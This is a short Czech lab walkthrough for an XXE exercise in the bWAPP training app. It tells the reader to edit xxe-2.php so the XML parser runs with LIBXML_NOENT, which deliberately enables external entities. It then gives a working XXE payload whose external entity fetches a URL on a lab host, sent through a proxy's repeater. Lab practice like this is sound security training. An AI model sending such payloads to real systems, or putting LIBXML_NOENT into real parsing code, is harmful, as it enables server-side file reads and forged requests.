Nejdříve je důležité zmínit, že je ve zdrojovém kódu xxe-2.php třeba upravit. z: `$xml = simplexml_load_string($body);` na: `$xml = simplexml_load_string($body,'SimpleXMLElement', LIBXML_NOENT);` 1. Zachytíme proxy 2. Pošleme do repeateru 3. Vložíme skript: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE copyright [ <!ENTITY test SYSTEM "http://192.168.137.81/bwapp/robots.txt"> ]> <reset> <login>&test;</login> <secret>login</secret> </reset> ``` 4. Pošleme